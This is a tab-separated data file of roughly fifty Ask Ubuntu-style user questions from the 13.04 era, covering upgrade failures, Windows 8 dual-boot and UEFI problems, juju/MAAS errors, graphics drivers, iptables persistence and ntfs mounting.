295933	what to do ? ! upgrading from 12.10 to 13.04 failed : (	i got an update reminder to go from 12.10 to 13.04 . i followed the instructions , was able to download the package , and started installing . up to a point where my computer ( seemed to ) restart and there was just a black screen ( with the backlight on ) for more than an hour . then i decided that this was too long for an installation and forced my laptop to shut down . i think that messed it up . now i 'm stuck in what seems to be 13.04 with bits of 12.10 in it . i tried to upgrade again through software updater but it goes to partial upgrade . but when i try that , i get this error message : '' an upgrade from 'raring ' to 'quantal ' is not supported by this tool . '' help ! what should i do ! i 'm running my ubuntu on my dell inspiron .
295935	xmonad xsession	my user level : noob-ish , so please bear with me i 'm running 12.04 lts . i have installed and , to some extent , configured xmonad 0.10 the `` automagically '' created xsession for it works fine as it is , but when i login it wo n't run a startup script i 've created and `` call from '' /usr/share/xsessions/xmonad.desktop , if that 's right . i 've read pretty much all i could find about .xinitrc and .xsession , i tried that and it somehow messed up the other `` sessions '' , if i 'm explaining myself correctly . had to $ unity -- reset to have the `` main session '' working again . anyway , my question is , how do i autostart xmobar and set a desktop background after login into xmonad 's default xsession ? i tried this script , start-xmonad : # ! /bin/bash # # i only used one of the following each time i tried , none worked # also , do i really need the ' & ' ? i know what they 're for , but ... nitrogen -- restore & feh -- bg-scale ~/pictures/picture.png & # then i want xmobar to start , again do i need the ' & ' ? i know it 's for it to run # in the background , but i tried removing the ' & ' and xmonad still launched xmobar & # finally , the only thing that seems to work in this script exec xmonad yes , i made sure i did chomd +x ~/start-xmonad the xmonad.desktop is [ desktop entry ] name=xmonad encoding=utf-8 comment=lightweight tiling window manager exec=/home/myusername/start-xmonad icon=custom_xmonad_badge.png type=xsession so , this did n't work , now i 'm here . please help : s thanks
295937	how to install python 3.2 in ubuntu 13.04	i need python 3.2 for development purposes , but new ubuntu 13.04 comes with python 3.3. is there any best practice for installing older python version into ubuntu ? thanks
295940	somebody help me with my paranoia	i tend to be on the paranoid side , and for some time there are messages in my log file that tend to get me going close to the edge of sanity . could someone explain the following in my auth.log file that indicates a user named dnsmasq changed their password in my computer . i realize that this might be a dumb question , but this kind of thing has been going on for several years and every time i see something like it , i tend to become anxious and afraid that someone is spying on me . can anyone lay my fears to rest ? discover-healing-honey sudo : pam_unix ( sudo : session ) : session closed for user root may 15 16:51:20 discover-healing-honey polkitd ( authority=local ) : registered authentication agent for unix-session : /org/freedesktop/consolekit/session2 ( system bus name :1.55 [ /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 ] , object path /org/gnome/policykit1/authenticationagent , locale en_us.utf-8 ) may 15 16:55:39 discover-healing-honey useradd [ 16831 ] : new user : name=dnsmasq , uid=115 , gid=65534 , home=/var/lib/misc , shell=/bin/false may 15 16:55:39 discover-healing-honey usermod [ 16836 ] : change user 'dnsmasq ' password may 15 16:55:39 discover-healing-honey chage [ 16841 ] : changed password expiry for dnsmasq may 15 16:55:39 discover-healing-honey chfn [ 16844 ] : changed user 'dnsmasq ' information may 15 16:56:02 discover-healing-honey polkit-agent-helper-1 [ 16995 ] : pam_ecryptfs : pam_sm_authenticate : /home/bee-hives-rule is already mounted may 15 16:56:02 discover-healing-honey polkitd ( authority=local ) : operator of unix-session : /org/freedesktop/consolekit/session2 successfully authenticated as unix-user : bee-hives-rule to gain temporary authorization for action com.ubuntu.softwareproperties.applychanges for unix-process:7420:308018 [ /usr/bin/python3 /usr/bin/software-properties-gtk ] ( owned by unix-user : bee-hives-rule ) may 15 16:56:41 discover-healing-honey sg [ 21950 ] : user 'root ' ( login ' ? ? ? ' on pts/1 ) switched to group 'mlocate' may 15 16:56:41 discover-healing-honey sg [ 21950 ] : user 'root ' ( login ' ? ? ? ' on pts/1 ) returned to group 'root' may 15 17:02:49 discover-healing-honey lightdm : pam_unix ( lightdm-greeter : session ) : session opened for user lightdm by ( uid=0 ) may 15 17:02:49 discover-healing-honey lightdm : pam_ck_connector ( lightdm-greeter : session ) : nox11 mode , ignoring pam_tty :0 may 15 17:02:53 discover-healing-honey dbus [ 1326 ] : [ system ] rejected send message , 7 matched rules ; type= '' method_return '' , sender= '' :1.19 '' ( uid=0 pid=1713 comm= '' /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground '' ) interface= '' ( unset ) '' member= '' ( unset ) '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.6 '' ( uid=0 pid=1546 comm= '' networkmanager `` ) may 15 17:02:56 discover-healing-honey lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` bee-hives-rule '' may 15 17:02:56 discover-healing-honey lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` bee-hives-rule ''
295945	binary white-listed ?	when i try to install on a win8 64bit using the live cd i get a black screen with the words `` binary whitelisted '' . i have searched around but the only thing i found was `` add `` nomodeset '' in grub '' found it here but i am not sure how to do that . help appreciated .
295946	installing ubuntu over windows 7 , recovery partition	i 'm currently attempting to install ubuntu 12.04 lts on my acer aspire 4830t-6678 laptop . the laptop came pre-loaded with windows 7 home premium , and it contains a recovery partition that i do n't want to lose . i want to keep it just in case i need to install windows over linux . i really do n't want to have to buy a copy of windows unless i need to . : p so in short , i want to keep my recovery partition intact , but i also want to use the rest of the drive to install linux on . how should i go about doing this ? when i go to install ubuntu , i get a notification that the installer has detected mounted partition . i 'm not entirely sure what this means : will it ruin the recovery partition ? my other question : if i decide to delete the windows 7 partition , would it disallow me from recovering ? i 'm not sure if the recovery partition requires the original windows 7 partition to be intact or something along those lines .
295950	( u ) efi > ubuntu vs windows 8 - problems with booting windows	i have a problem with a screwed dual-boot of ubuntu 13.04 and windows 8 on a new dell xps 12 ( efi/grub2 ) system not loading windows8 at all , ... here is a story : i 've got a new dell xps 12 system with preinstalled windows8 on ( u ) efi firmware ( i have never dealt with efi before ) . there are 5-6 partitions over there : efi windows 8 hibernate ubuntu 13.04 windows data repair but it worked as expected for few weeks . i decided then to install a new ubuntu 13.04 x64 on top of windows8 with dual boot . somehow ( do n't ask ) i screwed windows 8 partitions and got only a new ubuntu installed on a new partition i 've created before but lost the access/boot as well as a way to read any of the ntfs windows partitions i had . i tried to fix that all during the next few days by using testdisk , bootrepair and few other tools quite successfully and now i am close to a final solution yet not there , needing some help . here is the actual situation : ubuntu 13.04 x64 installed and working as expected with grub2 loader from ubuntu i'have all the ntfs partitions readable so my windows 8 and windows data partition are there on computer boot in efi mode ( no secureboot though ) grub2 loads and ubuntu starts up with no issues the problem is that windows8 does not boot from grub2 stating `` ... efi '' file not found comparing the issues with some others i 've read here seems i have windows 8 efi file screwed as my bootx64 and bootmdfw efis are 121kb big and not 1.3mb as some reported/supposed for windows 8 boot-repair does not help neither does win8 repair liveusb wit bootxxx /fixmbr /fixboot options whatsoever here are my boot-repair paste file as well as list of my actual partitions/efi files ... boot-repair report -- > http : //paste.ubuntu.com/5668969/ list of partitions -- -- -- -- -- -- -- -- -- partition start sector end sector # of sectors system efi > /dev/sda1 2,048 1,026,047 1,024,000 efi system partition win8-os > /dev/sda2 1,026,048 132,098,047 131,072,000 efi system partition win8-hyber > /dev/sda3 132,098,048 150,530,047 18,432,000 efi system partition ubuntu 13.4 > /dev/sda4 150,530,048 236,510,511 85,980,464 data partition ( windows/linux ) win8-data > /dev/sda5 236,513,280 500,118,157 263,604,878 data partition ( windows/linux ) -- -- -- -- -- -- -- -- -- list efi files -- -- -- -- -- -- -- /boot/efi : total 5 drwxr-xr-x 3 root root 512 gen 1 1970 . drwxr-xr-x 5 root root 4096 mag 8 10:09 .. drwxr-xr-x 5 root root 512 mag 14 01:25 efi /boot/efi/efi : total 3 drwxr-xr-x 5 root root 512 mag 14 01:25 . drwxr-xr-x 3 root root 512 gen 1 1970 .. drwxr-xr-x 2 root root 512 mag 13 17:02 boot drwxr-xr-x 3 root root 512 mag 14 01:25 microsoft drwxr-xr-x 2 root root 512 mag 6 10:18 ubuntu /boot/efi/efi/boot : total 239 drwxr-xr-x 2 root root 512 mag 13 17:02 . drwxr-xr-x 5 root root 512 mag 14 01:25 .. -rwxr-xr-x 1 root root 121856 mag 13 17:02 bootx64.efi -rwxr-xr-x 1 root root 0 mag 13 17:02 bootx64.efi.grb -rwxr-xr-x 1 root root 121856 mag 8 10:09 bootx64.efi.old /boot/efi/efi/microsoft : total 2 drwxr-xr-x 3 root root 512 mag 14 01:25 . drwxr-xr-x 5 root root 512 mag 14 01:25 .. drwxr-xr-x 2 root root 512 mag 14 01:25 boot /boot/efi/efi/microsoft/boot : total 2759 drwxr-xr-x 2 root root 512 mag 14 01:25 . drwxr-xr-x 3 root root 512 mag 14 01:25 .. -rwxr-xr-x 1 root root 1350888 mag 14 01:25 bootmgfw.efi -rwxr-xr-x 1 root root 0 mag 13 17:02 bootmgfw.efi.grb -rwxr-xr-x 1 root root 1350888 mag 14 01:24 bootmgr.efi -rwxr-xr-x 1 root root 121856 mag 13 17:02 bootx64.efi -rwxr-xr-x 1 root root 0 mag 13 17:02 bootx64.efi.grb /boot/efi/efi/ubuntu : total 120 drwxr-xr-x 2 root root 512 mag 6 10:18 . drwxr-xr-x 5 root root 512 mag 14 01:25 .. -rwxr-xr-x 1 root root 121856 mag 13 17:02 grubx64.efi -- -- -- -- -- -- -- i will appreciate any guideline / help from you guys . thanks in advance , b .
295951	how do i disable presenter console in libreoffice 4	i am enjoying libreoffice 4 , but do n't want to have presenter console on because we do multiple things during a presentation , and the console window blocks out any option for switching windows or system volume or other simple things like seeing the time . i have been down the road of `` extensions '' but it is built into the core of libreoffice 4 and can not be just unticked in the tools extensions menu . how do i remove , or at very lease disable it ? it seems many other people want to know . it seems this is renamed in libreoffice 4.1 ( or its a kubuntu issue ) to libpresenterconsole.so make sure you are renaming the right thing .
295953	modify limits of process ( ulimit -n )	is it possible to change the : - soft limit and - hard limit of a specific process ? in my case , my process is mongod and a lot of web resources tell me to simply write : ulimit -n in my terminal . but how will the terminal know that i want to modify only the limits for the mongod process ? do i need to write the command somewhere in particular ? also , once the above question is solved , is it possible to increase the hard limit since i am assuming that the above command works for the soft limit only . thank you very much !
295954	able to adjust screen brightness on live cd , broken after install	i am trying to use xubuntu 13.04 on a macbook pro 6-2 ( mid 2010 ) . that 's a nvidia geforce gt 300m . i 'm positive this is a video drive issue . so what i 've done so far : tried installing the latest nvidia drivers ( added the repos and installed nvidia-current and nvidia-settings , etc ) . this loads a black screen before login screen found out i have an optimus system re-install xubuntu 13.04 now i install bumblebee ( which is used to handle optimus ) following their directions on their website . reboot system , and success ! i see the xubuntu loading screen w/out graphic glitches . but then it boots into a command line ? i try to startx and i get : nvidia : could not open device file /dev/nvidiact1 ( no such file or address ) and fatal server error : no screens found ( ee ) to recap , i ca n't boot into my desktop environment , just a command line . it also seems the common denominator is nvidia . i ca n't find any similar problems on the internet - any ideas ?
295960	unity web apps create duplicate icon in the unity sidebar	this behavior extends to all installed unity web apps using chromium . after a fresh install of ubuntu 13.04 the apps were working correctly and selecting a web app from the sidebar would result in an indicator icon appearing and opening the said web app . the following day selecting the same app would launch a chromium icon that would appear separately from the web app icon and the chromium icon that is locked on the sidebar . i have attempted to upload an image but it seems that i do not have the required reputation , so i can clarify if needed . is there any way i can remedy this ?
295961	juju : deploying lamp charm on ec2 causes instances to terminate	i was running a ubuntu 13.04 instance on ec2 . i have juju .7 installed and bootstrapped . when i tried to deploy lamp , it caused the instance to terminate . ubuntu @ ip-10-62-73-113 : ~ $ juju status 2013-05-15 22:11:58,102 info connecting to environment ... 2013-05-15 22:11:58,877 info connected to environment . machines : 0 : agent-state : running dns-name : ec2-54-224-187-196.compute-1.amazonaws.com instance-id : i-e26f328a instance-state : running services : { } 2013-05-15 22:11:59,090 info 'status ' command finished successfully ubuntu @ ip-10-62-73-113 : ~ $ juju -v deploy lamp 2013-05-15 22:12:13,951 debug initializing juju deploy runtime 2013-05-15 22:12:13,952 info searching for charm cs : precise/lamp in charm store 2013-05-15 22:12:15,054 info connecting to environment ... 2013-05-15 22:12:15,157 debug connecting to environment using ec2-54-224-187-196.compute-1.amazonaws.com ... 2013-05-15 22:12:15,158 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' ec2-54-224-187-196.compute-1.amazonaws.com '' remote_port= '' 2181 '' local_port= '' 45900 '' . 2013-05-15 22:12:15,673:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 712 : client environment : zookeeper.version=zookeeper c client 3.4.5 2013-05-15 22:12:15,673:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 716 : client environment : host.name=ip-10-62-73-113 2013-05-15 22:12:15,673:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 723 : client environment : os.name=linux 2013-05-15 22:12:15,673:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 724 : client environment : os.arch=3.8.0-19-generic 2013-05-15 22:12:15,674:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 725 : client environment : os.version= # 29-ubuntu smp wed apr 17 18:16:28 utc 2013 2013-05-15 22:12:15,674:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 733 : client environment : user.name=ubuntu 2013-05-15 22:12:15,675:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 741 : client environment : user.home=/home/ubuntu 2013-05-15 22:12:15,675:2914 ( 0x7f1c746e6740 ) : zoo_info @ log_env @ 753 : client environment : user.dir=/home/ubuntu 2013-05-15 22:12:15,675:2914 ( 0x7f1c746e6740 ) : zoo_info @ zookeeper_init @ 786 : initiating client connection , host=localhost:45900 sessiontimeout=30000 watcher=0x7f1c731f3850 sessionid=0 sessionpasswd= < null > context=0x294a6f0 flags=0 2013-05-15 22:12:15,676:2914 ( 0x7f1c6ee90700 ) : zoo_info @ check_events @ 1703 : initiated connection to server [ 127.0.0.1:45900 ] 2013-05-15 22:12:16,215:2914 ( 0x7f1c6ee90700 ) : zoo_info @ check_events @ 1750 : session establishment complete on server [ 127.0.0.1:45900 ] , sessionid=0x13eaa3f9e660004 , negotiated timeout=30000 2013-05-15 22:12:16,218 debug environment is initialized . 2013-05-15 22:12:16,219 info connected to environment . 2013-05-15 22:12:16,544 info charm deployed as service : 'lamp' 2013-05-15 22:12:16,544:2914 ( 0x7f1c746e6740 ) : zoo_info @ zookeeper_close @ 2505 : closing zookeeper sessionid=0x13eaa3f9e660004 to [ 127.0.0.1:45900 ] 2013-05-15 22:12:16,546 info 'deploy ' command finished successfully ubuntu @ ip-10-62-73-113 : ~ $ broadcast message from root @ ip-10-62-73-113 ( unknown ) at 22:12 ... the system is going down for power off now ! connection to ec2-184-73-114-174.compute-1.amazonaws.com closed by remote host . connection to ec2-184-73-114-174.compute-1.amazonaws.com closed . this happened twice in a row , so it does n't seem like some freak accident .
295962	how to access localhost:8080 running on ubuntu from windows running into virtual box ?	i have the ip address for ubuntu machine , and i want to access the application running on localhost in ubuntu from my virtual windows box . is there a way to do it ? typing the [ inet address ] :8080 does n't work .
295963	unable to boot in windows 8	i 've installed ubuntu 12.04 and i ca n't boot in windows 8 , i can only boot in the recovery . before that , i installed fedora over a ubuntu installation and i was having the same problem . here is my boot-repair information : http : //paste.ubuntu.com/5669119/ what can i do ? i 've tried everything that i could find . thanks .
295984	something is closing port 443 ?	i have ubuntu 12.04 server installed and serving a ruby on rails app with apache and passenger . i 'm using iptables to control traffic . yesterday , i setup apache to use ssl for the site . after setting it up , i realized that i could n't access the website because port 443 was closed , even though i specifically opened it . the odd thing is if i reload the below rules back into iptables , the port will suddenly open and i can access the site from https . however , if i reboot the server , the port remains closed until i reload the rules again . i 've tried to troubleshoot apache as best i can , and also moved my rule to open 443 around in order to root out any conflicts . but nothing worked , there are no errors and i do n't know where else to look . i 'm hoping someone here will have an answer . below are my iptables rules . *filter # allow all loopback ( lo0 ) traffic and drop all traffic to 127/8 that does n't use lo0 -a input -i lo -j accept -a input -d 127.0.0.0/8 -j reject # accept all established inbound connections -a input -m state -- state established , related -j accept # allow all outbound traffic - you can modify this to only allow certain traffic -a output -j accept # allow http and https connections from anywhere ( the normal ports for websites and ssl ) . -a input -p tcp -- dport 80 -j accept -a input -p tcp -- dport 443 -j accept # allow traffic for nagios -a input -p tcp -- dport 5666 -j accept # allow traffic for munin -a input -p tcp -- dport 4949 -j accept # allow ssh connections # # the -dport number should be the same port number you set in sshd_config # -a input -p tcp -m state -- state new -- dport 22 -j accept # allow ping -a input -p icmp -j accept # log iptables denied calls -a input -m limit -- limit 5/min -j log -- log-prefix `` iptables denied : `` -- log-level 7 # drop all other inbound - default deny unless explicitly allowed policy -a input -j drop -a forward -j drop commit
295987	ca n't install wine in ubuntu 12.1	i ca n't install wine on ubuntu 12.1 it worked in previous versions but with 12.1 i get a bunch of errors . when installing q4 wine from the ubuntu s/w center i get : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . i 've read on the forums that there is a problem with installing a 32 bit application on a 64 bit machine ( mine is 64 ) - so i tried : dpkg -- add-architecture i386 but this fails because it reports that these are invalid options with dpkg . it did seem to work for others with similar wine installation problems , but not me . i 've also tried installing wine from the terminal but no luck there either .
295988	how to fix gtk3 scrollbar behavior	i have removed the overlay scrollbars . how can i configure gtk3 scrollbar clicking behavior ? gtk3 applications scrollbars behave strangely under ubuntu 12.10 and 13.04 . this also happens with fedora 17 and 18 . when i left-click anywhere above or below the thumb , it jumps to that position and starts dragging from there . the expected behavior is to scroll one page up or down . when i right-click anywhere above or below the thumb , it scrolls one page up or down . that is the behavior i expect from left-clicking , the same way it works on gtk2 and qt applications . horizontal scrollbars have the same problem . this is very bad for consistency .
295992	juju and maas : error no matching node is available - with ready nodes	i have four nodes in the `` ready '' state , and i am still getting the following error when trying to bootstrap : error no matching node is available . the server is running 13.04 with juju 0.7 . i have been walking through the instructions on the maas site : http : //maas.ubuntu.com/docs/juju-quick-start.html i also tried following the instructions to install the latest version of juju ( 1.10.x ) as described on https : //juju.ubuntu.com/get-started/ , but then i ran into some other errors , including `` error : no tools available '' when trying to bootstrap and `` use of closed network connection '' when trying to sync-tools . how can i get a simple maas + juju setup going for testing ?
295993	cron job not executing youtube-dl command	i want to use the `` youtube-dl '' command in a cron job to download videos fron youtube . therefore i created the following cron job : 26 00 * * * /usr/local/bin/youtube-dl -o '/home/ubuntu/youtube/ % ( title ) s. % ( ext ) s ' http : //www.youtube.com/playlist ? list=plbbpu9kv1d2b4wonnqp3bwsotlhvvtrzr when i run this command from the terminal , it works without problem , but if its called from the cron job it does not download anything . i 've installed it via apt-get install youtube-dl . which youtube-dl returns /usr/local/bin/youtube-dl best
295996	ca n't install 12.04 with s3 savage	i ca n't install 12.04.2 from cd because the video is corrupt . i have an s3 pro savage4 video card and a lcd display . after booting , the top half of the screen sort of appears but is really unreadable . moving the cursor around sort of helps , but not well enough to make it readable . since i 'm trying to install from a cd , there is no way to modify anything on it . ( the advice given to fix a running system ca n't be used . ) i have 11.10 currently installed but the last time i tried to upgrade it the network adapter driver did n't work , so i had to revert back to 11.10 . i do n't want to just try the upgrade again because i want to make sure all the drivers are working first . is there another 12.04 installation image planned ? is there a way to get past this problem using a cd install ?
295999	maas juju still get bad archive mirror	i 'm trying to install maas nodes by using the pxe boot method . i follow the maas wiki tutorial step by step . i get all node ready and juju bootstrap was great : ) but i still get `` bad archive mirror '' on all nodes : ( i can ping archive.ubuntu.com and i get is alive ! from all nodes . her is my config : 3 pcs ( nodes ) 1 switch 1 ubuntu desktop as maas server with nat ( lan-card and wlan-card ) sorry about my broken english . i am writing from germany
296000	/usr/lib/update-notifier/apt-check returns wrong information ; also affects motd	my question is related to ubuntu tells me i have packages to upgrade when i do n't , which pertains to ubuntu 10.04 . but my problem is with ubuntu 12.04.2lts ( and the solutions mentioned for 10.04 do not work ) . based on what i learned from that question , and related questions on serverfault ( also with unhelpful answers ) , i have tried running /usr/lib/update-notifier/apt-check -- human-readable , but it returns wrong information ( the same information which gets added automatically to /etc/motd and displayed at every login via ssh ) : 6 packages can be updated . 6 updates are security updates . just today i ran sudo apt-get update & & sudo apt-get upgrade and there was one regular update available ( plus 3 kernel packages , which were held back ) . but my update and upgrade did not change the output of apt-check . i have been having this problem for a while and just decided to look into it today . for 10.04 , i have seen fixes related to /etc/motd.tail , but no such file exists on my system .
296004	how to hide ext4 and dm-crypt partitions from a windows ( 7 ) install ?	environment : i have a bunch of partitions across several drives . a precise , a wheezy , an arch , a windows 7 -install and multiple partitions with stuff . what ? so how can i hide the linux-world partitions from windows7 ? especially if it complicates the task when there are encrypted volumes . why ? because everytime someone from my family starts windows and browses through `` my computer '' , clicking on one of the drives that it cant read , they are asked to format that partition . if someone did that to my stuff partitions , i 'd go full insane .
296005	ca n't boot from usb `` secure boot not enabled ''	i followed how to create a bootable usb stick on windows for creating a usb install with persistence . but when i try to boot from usb , i get this 1 line message `` secure boot not enabled '' . it 's white text on a black screen , and then nothing else happens and i have to restart . indeed , i have disabled secure mode in uefi ( so i can boot off an ubuntu partition on my hd ) . i 'm not interested in turning secure boot back on , as it leads to all sorts of other complications with my other boot partitions . i 've tried my usb 3.0 and usb 2.0 ports . i do n't see any fast boot options in uefi . i have an acer aspire v3 551 . any help appreciated .
296006	unable to detect the current gtk+ theme	i 've recently downloaded the app from copy.com ( a dropbox clone ) . when i run it on ubuntu 12.10 from the terminal , i get the following message/warning : expanded string ~/.copy /home/username/.copy expanded string ~/.copy /home/username/.copy qgtkstyle was unable to detect the current gtk+ theme . i know something is not working because the top bar icon of the app does n't show . how could i fix this ?
296012	how can i enable history completion by program in terminator as guake has it ?	in guake i can type ls up-arrow and it will show ls /home/blah for example . in terminator using up arrow after typing ls just brings me to the command i entered prior . is there any way to enable this in terminator / what is this functionality called ? i use zsh by the way .
296020	how can i uninstall opera from xubuntu ?	i have downloaded opera from the website ( deb package ) and installed it . now i want to remove it but i do n't know how . i tried sudo apt-get remove opera but it did n't work .
296022	compiz not loading the unity plugin since 13.04 upgrade ; shows desktop background only	when i log into ubuntu 13.04 , it only shows my background . now i 've tried ccsm to enable the ubuntu unity plugin , but every time i try to do it , it seems to put a check mark in the blank then the check mark goes away . i really need a fix for this because i do n't want to have to downgrade my system .
296023	mounting a directory	i have a directory in the /dev dir called media/windows . i need to mount the /windows directory to a ntfs file system partition in /dev called sbd1 . i have tried mount /dev/media/windows /dev/sdb1 and it says i need to state what file system type so then i tried adding -t ntfs at the end and it tells me it failed to open or mount /windows because it 's a directory ... but that is exactly what my assignment in this class says to do .
296024	how do i remove the apache2-default page in ubuntu	i need to remove the apache2-default page so i can add my website in ubuntu server ! wqkb.com is my website . i need to put the index.html page where apache2-default page is
296025	`` about this computer '' and system settings/details do not open	when i try to view the systems settings / details or click the `` about this computer '' on menu bar , nothing happens . nothing loads , nothing in process list . its a fresh install of ubuntu 13.04 , built in a virtualbox . any help ? thank you
296026	how to remove the skype panel icon in ubuntu 13.04 ?	this question has been answered a couple of times on this site for other versions of ubuntu , but the proposed solutions no longer work in ubuntu 13.04 . specifically , i tried the solution described here . however , after following the instructions on that link ( i.e . creating a skype apparmor profile ) , skype fails to load with the following error message : /usr/bin/skype : 8 : exec : /usr/lib/skype/skype : permission denied . strangely , the same permission denied error happens if i try sudo skype . so is there another way to remove the skype panel indicator in ubuntu 13.04 , preferably without removing sni-qt ?
296029	can i use ubuntu one to offer saas and iaas services ?	i 'm thinking about the possibility of using ubuntu one free version ( ? ) to offer saas and iaas services . i do not know if ubuntu one would be a good alternative to start with . what i wonder about the ubuntu one free version is : if it allows execution of software and using some space on it to store data for free , and if it 's possible , to what extent is it allowed . does anyone know , or has anyone used this service for free ?
296030	error mounting ntfs partition after hybrid shutdown with windows 8	i 've got this error and i ca n't access my files located in a different partition when i 'm using ubuntu , but when i 'm using windows 8 my files are accessible . i 'm using ubuntu as my main os . i tried shutting down windows 8 properly but still nothing happened . is there any way where this can be fixed ? error mounting /dev/sda4 at /media/kris/backup files : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda4 '' `` /media/kris/backup files '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda4 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
296034	i want to install ubuntu 13.04 on windows 8 with dual boot	laptop : hp probook 4520s windows : windows 8 x64 this is what i want i want to install ubuntu 13.04 when my computer starts , i want it to give me option to choose to load windows 8 or ubuntu as windows 8 boot loader option ( that blue screen , not the ubuntu screen asking for it ) if i dont choose within 15 seconds , windows 8 loads default as automatically also i want to be able to change the defaults can anyone help me and guide me step by step what should i do to install ubuntu over windows 8 to get what i want thanks in advance ! edit : there are already similar questions , but in this case , windows is not uefi , i have installed windows 8 myself , built in windows was windows 7 in my laptop and i can not understand or find the easy steps to do the above anywhere
296035	how to create multi users account ?	i want to create multi users with generate password and print out as text file , how can i write in shell script ? ( ex : create 5 users , password 10 length )
296036	best configuration for 1 ssd and 2 hdd 's ?	i 'm going to be buying a sata 3 motherboard ( gigabyte ga-970a-ds3 ) and a new ssd ( sata 3 ) as my boot/programs disk . in addition , i will be using my 2 old maxtor diamondback 10 's ( 7200 - 300gb each ) for data storage . one of which is sata 1 and the other is sata 2 ( just to confuse things ! ) i want the ssd to be fully independent and running in ahci , for best performance . i want the 2 hdd 's to be in raid ( seperate from the ssd , to avoid any speed kill ) . i am also running an ide dvd drive in sata , using a ide-sata converter . how will this fit into the configuration and will it work in ahci mode ? how do i go about setting up this configuration ? or is there a better option ? the motherboard has 6 sata ports , labelled 0-5 . i 've no idea what goes where or which ports are controlled by which controllers so some help here would be great ! any answers here would be really appreciated . thanks guys !
296038	what is the difference between tmpfs and ramfs	i have read about moving the tmp folder to ram would increase performance and also read about ramfs using ram as storage and tmpfs using ram as strorage too but what should i use in /etc/fstab : tpmfs : none /tmp tmpfs nr_inodes=200k , mode=01777 , nosuid , nodev , size=500mb 0 0 ramfs : none /tmp ramfs nr_inodes=200k , mode=01777 , nosuid , nodev , size=500mb 0 0
296044	guake no longer showing desktop when opening	it used to show the desktop as a background when i open it , but for some reason it 's just overlying ( so the top most window is now the background ) . is there a setting somewhere to prevent this ? note : i did n't like setting an image background because i ca n't specify how the image will be positioned ( tiled , streched , centered , zoomed ) .
296047	after installing ubuntu 12.04 amd 64 bit alongside windows 8 , i ca n't load ubuntu nor no option for dual booting	i had windows 8 installed in partition c ( i had 4 partition ) . i installed ubuntu 12.04 amd 64 bit . after completion , i had to restart it . after restart i ca n't see the dual boot option . i try to follow some advices in this forum but none worked . one of them was i try to repair using boot repair by following this procedure : 1. sudo add-apt-repository ppa : yannubuntu/boot-repair 2. sudo apt-get update 3. sudo apt-get install -y boot-repair the result is http : //paste.ubuntu.com/5669675/ please help
296052	how do i display an html file on a web browser in ubuntu ?	i am tasked with displaying a program on a web browser for my final project . the browser would be run from a cloud instance , and i have chosen to show an java applet that i have made . i have already install apache2 , mysql , and php on the instance . how do i actually make the html file work on the instance , so that a user can go to the url and see the java applet ? i am very new to ubuntu and linux in general , so a simple explanation would be preferred .
296063	partitioning issues with easeus how do i proceed	ok i installed easeus to set up a partition for ubuntu . my laptop automatically has 4 primary drives : * : system c : d : recovery * : hp_tools i have an hp laptop . i read online that hp_tools is a back up of the bios and that i can convert it to a logic drive , no problem . i was able to convert it , and i was able to take 15 gb from the c : drive to unpartitioned space . now it wo n't let me partition that space to a separate drive for ubuntu . it says i need to convert another drive to a logic drive . how should i proceed ?
296072	lxappearance changes not sticking	just installed 13.04 , in xmonad , want to change my gtk theme . run lxappearance , click on ambiance , everything changes in lxapperance , it all looks good . hit apply . no change to any other app . close lxappearance and reopen it -- theme reverted back to raleigh . > . <
296077	how to install system settings	i installed synaptic , and it wiped out the default system settings . i did n't like synaptic so i uninstalled it , but now , i do n't have system settings anymore . how can i just install the system settings package in ubuntu 13.04 .
296079	can not locate package	whenever i type an application that could be installed into the terminal it says this is not installed yet , type : sudo apt-get install [ application ] . when i do this it says can not locate package . am i supposed to make my own package ? i am a total novice and have no idea what 's going on . i 've looked around for things but i ca n't work it out , figured i 'd just ask .
296083	can not install java	sudo add-apt-repository ppa : ferramroberto/java after this command i am getting error : error reading https : //launchpad.net/api/1.0/~ferramroberto/+archive/java : could n't resolve host 'launchpad.net
296084	ubuntu re-install fails	i was trying install ubuntu 12.04 after formatting the partitions where ubuntu was stored . i tried re-installing and install process fails . i tried again with the `` nomodeset '' option and i get a couple errors saying `` microcode : failed to load '' . i ca n't even do the `` try ubutnu '' option without the install hanging . i am using the same install cd that i used the first time . i do n't want to format the entire drive because i have another os on a different partition of the same disk . not sure what i can do .
296085	why do the versions of thunderbird and firefox differ in 12.10 ?	i noticed , that on my ubuntu 12.10 thunderbird is only version 17.06 while firefox is already on 21.0 . it seems , like the updates of firefox are somewhat faster ? do i have to install the ppa for thunderbird beta to get more updates ? or are they unsafe ? ( i have a lot of important emails inside my thunderbird , that i have to keep access . )
296089	help starting up multiple dropbox instances on ubuntu startup	i tried following these instructions here http : //www.dropboxwiki.com/multiple_instances_on_unix but my 2nd instance would n't start up on boot . i tried the rc.local method with a bash script but even running the bash script itself from the command line would n't start the 2nd instance . the only command that has worked to start the 2nd instance for me is here : home= $ home/.dropbox-alt /usr/bin/dropbox start -i how can i get it to just start on boot ? i 'm a bit of a linux newbie so need a little hand-holding , sorry ...
